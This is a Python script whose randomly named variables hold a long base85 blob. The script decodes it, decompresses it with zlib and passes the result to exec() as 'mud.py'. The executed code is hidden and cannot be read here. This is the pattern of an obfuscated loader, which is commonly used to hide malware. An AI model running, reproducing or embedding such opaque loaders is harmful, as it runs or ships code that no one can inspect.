#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# _SYhqKJLQbcDB_lOycpgjdvygW
# _tULIHCUrcstm_HKdzngsCZGrq

import base64 as _notOKSaHWlPW
import zlib as _DsCxmGEoBwug
import sys as _yHXdpgsPPQcz

_SBNYaguECzJl = [
    'c-qxn>vJ1Lw*T(GqS01eNf%}OOo+YLRfNPqia@f7fu%x9HIiD=;L(hjhaKZ`6(J9@x!K*k$lYa0v1}kt',
    'OhPsb0kXS)$mrXaKkk>ypK#CVo=5jgk0dJ&$u*88&2*ps_36{+)n~*no*VaFXS`-u<J4Lv-Bqt`Thn8|',
    'AoGv$1KkOE)1{83cPQE4ru8N2kX<CW8Qc#xf;*&lD!3OsB*A9yJiL8Cf{osp-i6-z;BUbLXt2o$ytFz;',
    '{=ISPU$?IPYvbnDAMTRZ{kCpddV?I$+dvO4@q7Q?_~>x~j~Sh=?Rdmpb)&bQ(V@|MJHG1ZR>SVZ%{|Ak',
    'T4ON!*0m4$FX^3yxoyD2&cH-rGT*{1FR*Fd=kq+<I~{BWw{f0Hw<q*F<~gf#W57%j;ivEW)b(6;?dZa<',
    '-ds4gc&vK(H8M{Y9iNWTlXcql$U)Y6!EtOy>h3$HY1FikisBB%E(+o=>!wS`GH`T9uNn2KL*2ICrMzR)',
    'u{)$@Gz?8QTef3(?M~FZMZIdnaJ#0y%9`#wy6>ff`-gxpHVmPNYliC*+=R6`5AV)B@m1OOD!y`bVc`t|',
    '*bDDYOiv%5o$3_EjxHR)nZ?&8;o3V3hYlTnJGnLu*Y>}&?+vlt9=P_>;X?<6Ym<!Jv4zFt(ga+RS@c!#',
    'i0$6{OmG)%=b2#B*y7=%)gwm_|N0$(zQ)$N(DuA;VGiE7c74g+-JTmCpPYI@n}Gi&=Vm8%PZTOiLl;{1',
    'Yq&o4=COq;jFKZc_nGY6LH<01Hygn{E=`YM%io5Lf9L0B(^!KxVPBOzdeSR%=`R!tDR{kesD1^U1Ql@b',
    'WA9_s#<zp-dZ&A5NboSY2UqWbzJ?Zy)ae+OZUQyFg`3H?;^W{?yu+iPaBnw&f2rNBg>N|2R431OEOEb=',
    'B05RKaI-J47sIyZR3wo0So(86$qsciFz9E|(7DTa<j}swmk%F({a7s6lOWS;1+=LsvoGs)TC?q?LWM1{',
    'QMWC;{L|-G{{WW?ppWq*6LFC1m6a8(8TQcXc4vHTop%&|3ZA}1t!mwFP}~*ArzR#&0404{H%z@|(&Wy}',
    '#LS6xzKNzJPzNp7(_4<-$)fr(2bB?Z31N+=ag79PT7tE>Vt5|74CCb2NL_$+>6QZ4$vh4{Hmn&5);qSp',
    '=+|g8Obl!5`uG3)<L^lh!&YtIgI)~di#xT9yCq=9EWKNA>t0A(;Me7U<e+lHE)165Xk^$o60AKEtRsd6',
    's|b!qR=O_c!0JX_c2v4vkYF7$tR>nwXl1!|<)1mQOxDG)7%K3+Gr&fIwO4|5lr|cM7n2oWeR(|xmczO*',
    'P(HZt*)1><tXX+4`kk8Ts9;_EPyuUgUGrEEM3uK8M}jpuF(<(Km2W$GLO<DyH?HO|>wWCOc-3|6reV@F',
    'yGBDbDWZBEgv9S;nYH!VZ*w$6hxN!+4x{6m5^=p^c(3|3)goT{qXJY5oOr)BK&y@hYg&YL%%gfov4}r?',
    '{=07!uv}~opgO)~c&mIbHg;weXGB;B=(3?(-ad!#MiJKS9N}v4F1q98aBVbLyXR6?vEEiK;^#MWV0o;I',
    '<}Hu!sBG;KVZ8-`x2;~py9!v#*nE(|9u3wD(jr3B)sBshX3B@S`Y3M^lP+q2qruuMiM;Jwjs2$WH!`xd',
    'p%Qs)UdQHrST-80SqWAbrrli4xHbUmdj%}JOD)aieR9puX#T0B<zF_9`jXQ4T>T->Yi3=zo~L$qht&L(',
    'q~;f?NfWPGRP*O^)V!y4=o9f!rzAbU-&i(0-B2v!^?&9dtMe{>oQM&DNt*r*qt*8I>rI+*1uv=$P~D-r',
    'XFHmO-RjUyb3MOd*s|#!4VR?q4^i9ForX>J9ZYG7Tc;Gb^ln!(!!DX`s6C0%V9BbUS}sgqVSzUOtdcI?',
    '9IVf{pDSgf!ID({0a%vKF}4yZZe6*jfYrd}eBqE;YG|XudLaYLG?plGpimKo>&HA;QS&^8jRtFP29}F?',
    '>GUFAJey~M;x3`OuNqd<er(yAl|}xfQP(-EWLVc!PL~-s-)Y&JmQ+2+I{KWE@)9kOO1AW<c^_0G!je?|',
    'Yp^1kLZfbdmgfpC@g8|m#;B+yJ%7a1S6dGH2261Y%=*&}1*~q|yifeIZCLALW3MjkJFsvxNqH6U6lvGK',
    '7PUNRSc(&Th1cy54Aa!dcWV=*^tNF&>=l>1u?Rt(Ht|aW7xv8jlAPQ#QznI^)4nd4@3(2~HNzX<J^g|<',
    'y@!-udv)>kLluJCm%KvjOSaTwf7`La&`wUxu&nR|Ii@#t#|V4#hGhi)_Ti%k5cY8nyP-Qvz(y0z4ZJoD',
    'hcd3>Ul$A!So*?>Z8qVB>Mav5dq#_bXHsZ5dJA35f@N6m=~1fMZR;>axY}ylnExo$Oud2KnhyWGY;;-o',
    'rf$|*cSm2Q_*%DX7}yp-ysZXn0$~p|Bf=JCt-HoayjG~M)>s?MUdB$gQ^OQOq3fG2!)}{8-Zp)Uy?#I;',
    'a)J<|pm*uX80(7BWDpSo&d@YGeC;|+brpQmV~9Gmg)i+@j@<K|nvF9sb+^rD_yLV*E*Vw}uD$P5HYw9~',
    '8i=-SP~>5oI@q&jyDnm>^U?59M?Z;I%x*hoWzF>QzC)2h%Qo@FHOyrO0tT()%B{3H<~m?@8He-_e71<o',
    'hHX-u-g|5TI8BdYAXPw##wDc72#Qmxt#U#(>)p^joU_F!xT{v3P1sL(*Wo6oZrivVv}<6C6@#H{I+P>V',
    '@t)_fd2~4}M_*waz=mTdqzw1}qu()hdQms2?v%pA3)|J)RS?-usaQANA|5-yC3dnrKTnF5S0ogKlN4F6',
    'Vwsbu>6S%f8nEN4uBUsx3tO~VSYzjD>k#Mug{;9y#opQ8so+uXa_>yByuQYc!qy8oQgrsiMu3h-7Y;zT',
    'Yu`oPf=9s*scvjQ*ROeoXHs^^#+nW|@g^|*nci;*T=^D0-@?-uJf7LaBS}2EDVF1zfcB(jM3@~mp9$`S',
    '_hFA&Ua5&^G;4VBx4wpFed};<>-u^8{p5d$@IHK#`rX!bASithM;f|q-$4cNmj&{dqc_*KKDi|P-Wc|}',
    'a$H1}J3?L$`ExF?0TUU>Z2_Bf`I<DjG^$+sm(zXHBrb1bEk5~FnrtpBZX}&@xXOuTFRFW8R`n7YqJV&t',
    'h#Ti|GLKt%tAzZ>g31ge-pgyx`804~-0*3>hg}s{*$x<R{YFAib#1uTL~%Ji;8>_F$JThsLa3%Bw|3at',
    'pO_TWcj5S#p2~0RID(D%Eg@@>8Cd66#-1v;h)*$t*J5L`j`bXK`~tU=>tkR-LR-pgO0`2RKeDHF-J@8V',
    'L*3Zr#h(%wBuu3}$TwsB<3?~7E}ezfN4*P$as|t(TC_A-A(K<(awSdh%0JL>e$+e1>M4NKX7B(@5_%tF',
    'U+K`F)0qZBdlZCz_Z2H;2=1flMMAfOuhS$FDtmy+tcuD*0uBSr5U6~_ZT3U>_aH+lq%&I~Q`u>SxjmBb',
    'Mu8-uGBpKMrWI(uyw1G}tlzj#I1()3KtBJqcN$24ArMZ8O~=Ge@Uko0!F8>oXH{YESX*LP!g41i7LlXz',
    't|f2bwTMRS5G4g0IE3YQLXw=mT(r>zd5Q}kjzilM^6hX?kX`QFK#RGlXe5oSb&nS@bS<7(XYUaQyhlNn',
    'F-HW*MBMkM&o5pI-MY|M3q7*aq0|aRAs|5DFLGJjfX4UH|B7as206P|7~|R%K89R$0-ae!)i^og*e6$W',
    '2<@5_2z|O468Z-A!ujAXka*X^iHfBy&q|e6e|Nt@A$;<xpnM|z(lYIuZbsgBRBdG0o>*0wNKRPV!^^WW',
    'MMw_FR8;n;wWwE;L@G%UW0|T3ARusj5AbNV(;C;i#<<ZfR8mrCpM<?IAD5oVw=vsh``-NIgnYeCAz*ae',
    '`7p;3-%Iuf28Re%dk;d+QgR*Uj<*>2!a)~SwNRG#O;V%A${-bWQ1SKrs;RE-^19G;#ao8QY}q`!)iUX0',
    'EL$YsEUIF{y!GjynNEyrWbec)M}og&87-FAehoJ^*^bMq7!EVF+e2l+M)>`=1dPuHY?=#vSDy~P>z%^Q',
    'eh#;brfC_vhDt=G3GjGw>$9_L$MJpn9RR+JBY=_s(3{-)-3A?k!{2)@GYrO<In3F*aZ#WgGh&kmhU;Wk',
    'cxN-X3G)Ffa1(6hX~Hp}`GrPv7(0^x$g-^7wv9Rj)1a2SeoCb?b@(v?N0ZA8%vYeYzG3sieXvTHIXw@5',
    'H+ugad`?QM<5qc&h_lnMOuAbtYo@(|F}Wz$(clotuNGyQ?&y}Un^iVSDRf2TYm(F@yHOHAK?=Bi3Iq4A',
    'aSC%JuktgqI()JTlLVP!W$oWYR^mh6RLz1&o_LdZx>6BqRKLpFRFW!H_BnCia<+U*Cb`gqV4}Z;e=yH+',
    'A%#_1Ls|ai()Q3W3b_mNOj(j9_3G`a@0ca{7m5dPJ4gF4Esp$)xu4GXykT23-;Tf-m9$o`#MU8vt%&x3',
    '=qBueszV!w1NsC^2rOM%d4c}tJ~&H|D^!EB7Qd3Mz~?022iS5`?I?d$PN1A$$-82B?KCO)h-ddD_$<z}',
    'Omr73f4edTaguN|oM*bASDc9U>f+)NR>+SOsj|cu&$b$&QDRoS>W9ysl)9$wf!Emq?u3^@semznFVXGe',
    '?11BhhVOOYOVl>&OyEeELzDz<fL%?bN`{|du;Mul&d2ww9lMd`Bo|1$*GC?OMafVIXOk7U;YzH9H7Kyv',
    'N={B>iB&X=_9lY>0YS19=>wt@8AmT^QV6$)l8|`*q#(j>7Zm#|YT#Q-mc0T^geVxq);B$cTvZ6?;r8VV',
    'ut&M+d2wpFeuiMkP_r{f06dCBZxiz3S~LcH*gAIwLI^;RcpCDUoD+Q=GjKp)oSR_g&If<Z87YT4UvLF=',
    '(aDHBKX5I62yXHR4#HHyCI($%id{XZ(s`1GxN%i*A~9&YpHEX|_f(PK(?2U=3J>f`H4-+rl+ty{hHA1C',
    '-g$DIht*OqbUl{l$TEx4mn!fEHd7pnYlcUGav7y{ITYu0wS!dzY{mba*_&~oqG&c9X`=@#3M_Z3SoDpz',
    ')=aQ364df~d~Ad3AjIC7!17Ld;wew;H%o^+1a{7#gC3!0-Z_sDqK88(vH+qG{`C2kFUVWAxpnR;d7kXY',
    '$8OF9UtuB%1nZQ->kI{1%~}@mGaUjmp2%7&TuP%tN|q0rDq>$57nZ^$>gXPoIU6l=g-oU*%m~TxHDi5T',
    'wInCVTCDDbBuspX=VIn2cdru&vI-S|(3me^1zFSd-FC_qVuxtaiQQnMo`pJurj|Ml*22+GYCCCq7aX8Q',
    'sg#~-!tvup*e}Jb`Y)F=i380wDeaafwB3?d@fuyN*}Bs>h)**(e%Dha;xef?ruF`GE%g0kDdURuHf+7G',
    'CC^`W{B!p9Cztx{?fwRer1!MU$n>tB%j^c0KV&P2<`twkMIp-+!mZyLQ!I0m5zK6@%*-O|oI8rEFZYR?',
    'gL|NFevBTsLk`>u?sCfpQ#=DVw;e6>0Tr<_ICxCwjk}FHh{^Z?@LNn<Z;U6{69ub*nkr;Hd*;Ujp$aLk',
    '6mffk=VVx|`J(SNckL}Qm%f?Z4#O{s)Jt1&K-VDu#kGkQ+Hm14$}#6MvUQG07R(?oeiifN>GSueZpd5U',
    'tMaGIOLgFzH$OEIs$j0kP!YP|<#Yb5v<;IIlSN+aZkhZSVf_+*!`&9F>wNgox`r>v&E4#nC2khU1vD%c',
    'wfAfTXz~s`Ipdc2WA2*n)(xY|#Imk~nS4Hc{#|PrEyIIIcWIsvSr$WDhECHPjg;FPdfBD{foL>`gcB>a',
    '(*W1KQ?qx98!M9uC-}rltY|C2>Uygt&9V!^_8EB>@^)ZxW!d(jFO0(2Qc4k-tdQB+S%ER3mmE@>OhwvL',
    'gRn~DtxV;Roq9~NeddxomFXO&6syIdS(A<(w+WmNC2&QO!ePV@zk{HPHH{_w)73$y=fr%r?P_>YqbH%i',
    'n{L!UxgACjXV4Hw;Rv4Kz`y%kg+=6Y^V^XFpXlwV3n*`A2<2@W7C*Z+BXh&_IMd%v&7pdOwc!4K+~$PL',
    'IcN}bjQNtWi{^%#b~@U$UEM(g#jcX^aWc)W)^xAl#zH1R_hHMjaQFH7v_8mbA?i-Dizx$kKNPG`dfc|(',
    'Y{IhgTjG4!l~mk!KKMR(6#Gcz89X}+6XG4ak@&?S&pSN1!@ZLvBtSPsj=gv)yEIvjVqtzi%J4>KoCJ>*',
    '&SQtD$CTWIooL=6qFH6GO;{$I&Vh4$;A~F{PPQLfqBzZ-O|XaL=g5mJ?vu!dq!|@;{1VPSdk)0d!H<7-',
    'C^#8DGRcM|OsB>ini4qV=qp3<hj}$D=6x7_8O?3@z$y*Exh87n#XA_4gD)uuAC&`)uDM;)@JfYBfoTU{',
    ')(-tr0y7GQmPvw!F)J4YDN>EGWusGdgc^6i=oDA{#WkO&7>0~MM_%adEp~1YxHt1<7kvW3#|{RS2de4}',
    '#7yoH5m%Wo$Qh&`+<JD@CRdoc@7YRqsXizSr;`NCVL4MWJFLLT&D%t(GO64M4{GB;Bvk|)e8<%7Ev$6P',
    'FDaSICkMeZOH{Jzs!dYDClT;TgV|Y-`EowVX_+K+{~Hjz%L#^=*srkyt9LG+$V`gJM{HhSpiyABxYq;W',
    'XI!nq4sbC`pFV^Z&sR5sZ}9w?1V5m<2C8@Bsxm(9oWs`0(g*{9LMeg4si01UKht6%MMf2IUji|CB}w4|',
    'gU=FX?i7(Eru4Wq!2lnRn(?3+;}==yX7=`5y6IElORLf_rY1xiCvq)iMAM2q?H;9E_Y|e60hH3ASwF`;',
    ')mP~y3I;EQWJWwS&{-&}wtK*2EH`{0`qnY$GdU6T`7sAl9>xgD(ExMu#Z|yyAa1TY@ETOwAxJo8;cyN-',
    'D2Tp%N$XeV(m%idw6fuY?7nyu@a6STheghq;FqRsc*-vovWY_^o)s!<8yS1R_I>d8;0HN%Kb#dEU_lc-',
    '*guKCJ%{KCI73g^<K3}DyaI*Fsd{Re^^6)2EFF>)Hh>|d#0T$);q&)1+sfZ_r5fh&V}C#j^YU~0*$lqF',
    'oy<K5Y5#=%%#%sjhtoxO=P9P_(@IQpC|s)3QjruZ#VTOf`CPug?Hs-j>ag&HGxyKtw@=1V1$%IUdLHoD',
    '?NbdKKG+y0ulN&+3fUgAOgw!EoF8<s$5BGh70X>CLXpymqnS`y4GcTN@1Kf6=9h#H6>${VGnJUM4a->3',
    '!MK19M#dW{vZpqarcps-IHiGs35@i|5cUI>bA2SmBK3Cv7^Ht$C-zSH;$oGwP^{F>xZ0_5*L2fqp=nb3',
    'iSDN;V3D1sqR*G|_t4oJ;xX5huSd3STul3WDif246>jmr^v?0U%|NB=s&mwE<ZCUUN#@}cSI4*UnTvFV',
    'cJ_;WZ-XCs4&I%G@ReP7z(o7or<jU}lC_4lUF|TShBf0t^eb==_Xuz>V&4F_FSqi2Q1yFMoc<g^wudSo',
    'zX}_65q@Lt+1|$_t#{OcPBx}g7I&qJ;x*JkkI-i0qfn@f;>jygkcoFV8P#2+*CV?o{LB&gm0FMRNxA&`',
    'dS&VOgWgBIvto7GoqkD;O!a(WS2_Wpct9)6XrV26gdBekwBcpJInCH`ch$usF0V8pj2mjDc;wl=sgY%4',
    'D5o+~EX^3gB<Ep4f1l<LJCPc7Xwqq0JM?2;eHfK*dL>JloFsjCjU?HN#D5<^c1kc~ao{YaT0gu-@{)_}',
    'n+ITqy^n*9$mU6oqjX@DlY!e{Uy}ZP@Mw^9h7!7>JmuNJ)1LmPKFJ<bR7vtUQLcA3CCpQW{9}gXA;MI0',
    'cc_f+aH||88>4LQ^C&bASgd(AKegMB_DE^oegwCj@=X(bvf1C1hzywt9$2OSSQ%n5Ej-yLEvzWS&r1=j',
    'FilP<n+#4JZ$FKk*+K(S%A=*1<xyNZG|fI~=RwG4a*(Ui(TXf|UWU0J1M;%XsYUFQc~%<I;W@Yy`RV?)',
    'T=W!v&IGlTJp^MAr#X_Gd5#O!x3pcY9}^S3&6IYI@6lfwr;^z@tsbKkJ>P{=m!*#ltw={c@mH)9vl}@{',
    '@9ZN7Ip0%|JKb=i6a5<ZaW(R~NTOJc^!G$=dsU&h!dMKb75F&{$WxBHW^zSX+*K@VhRf<kOJxE!g;`ME',
    's4P8rk_u`<mP%g}A#^>l6CpvIzED)64|moyYJ4DM(jvZ&7!-uX3PNn~#9aPudHl+Hwe7m#iW-iw!KQ5|',
    '%vzspgrd$fpL%eSME{pC%vn4@pY|sEDv#f2eZtJFCFR2>t@M@-yGK}2IkSfU!ylFbxWn^mTsF=IchDzQ',
    '=iA6Q*)_?HL-<uA<pF|#Comkw&yklHoUIuHKvnjgG}S7@RIOqru38O|@wD97{{f+;I-C',
]

_TPFYHclqxntb = ''.join(_SBNYaguECzJl)
_HQNYymBiHGKn = _notOKSaHWlPW.b85decode(_TPFYHclqxntb.encode())
_cHYiwXEKzJPR = _DsCxmGEoBwug.decompress(_HQNYymBiHGKn).decode('utf-8')

exec(compile(_cHYiwXEKzJPR, 'mud.py', 'exec'))
